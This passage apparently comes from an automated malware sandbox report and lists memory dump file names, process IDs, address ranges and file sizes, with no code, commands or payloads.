memory/5960-347-0x0000023BC8700000-0x0000023BC8702000-memory.dmpFilesize
8KB
-
memory/5960-346-0x0000023BC8700000-0x0000023BC8702000-memory.dmpFilesize
8KB
-
memory/6020-311-0x0000000000000000-mapping.dmp
-
memory/6060-312-0x0000000000000000-mapping.dmp
-
memory/6092-314-0x000001D4C0120000-0x000001D4C0130000-memory.dmpFilesize
64KB
-
memory/6152-328-0x0000000000400000-0x000000000058E000-memory.dmpFilesize
1MB
-
memory/6152-326-0x0000000000590000-0x000000000063E000-memory.dmpFilesize
696KB
-
memory/6152-325-0x0000000000851000-0x000000000087C000-memory.dmpFilesize
172KB
-
memory/6152-315-0x0000000000000000-mapping.dmp
-
memory/6168-316-0x0000000000000000-mapping.dmp
-
memory/6268-317-0x0000000000000000-mapping.dmp
-
memory/6280-318-0x0000000000000000-mapping.dmp
-
memory/6332-319-0x0000000000000000-mapping.dmp
-
memory/6332-332-0x0000000000400000-0x000000000058E000-memory.dmpFilesize
1MB
-
memory/6332-327-0x0000000000871000-0x000000000089C000-memory.dmpFilesize
172KB
-
memory/6332-331-0x0000000000590000-0x00000000006DA000-memory.dmpFilesize
1MB
-
memory/6400-320-0x0000000000000000-mapping.dmp
-
memory/6416-321-0x0000000000000000-mapping.dmp
-
memory/6500-340-0x0000000002D80000-0x0000000002D81000-memory.dmpFilesize
4KB
-
memory/6500-339-0x0000000002D80000-0x0000000002D81000-memory.dmpFilesize
4KB
-
memory/6524-322-0x0000000000000000-mapping.dmp
-
memory/6524-338-0x0000000000400000-0x000000000058E000-memory.dmpFilesize
1MB
-
memory/6524-336-0x0000000000590000-0x00000000006DA000-memory.dmpFilesize
1MB
-
memory/6524-333-0x0000000000921000-0x000000000094C000-memory.dmpFilesize
172KB
-
memory/6668-341-0x0000000000590000-0x00000000006DA000-memory.dmpFilesize
1MB
-
memory/6668-335-0x0000000000881000-0x00000000008AC000-memory.dmpFilesize
172KB
-
memory/6668-342-0x0000000000400000-0x000000000058E000-memory.dmpFilesize
1MB
-
memory/7008-330-0x0000018F20B20000-0x0000018F20B22000-memory.dmpFilesize
8KB
-
memory/7008-329-0x0000018F20B20000-0x0000018F20B22000-memory.dmpFilesize
8KB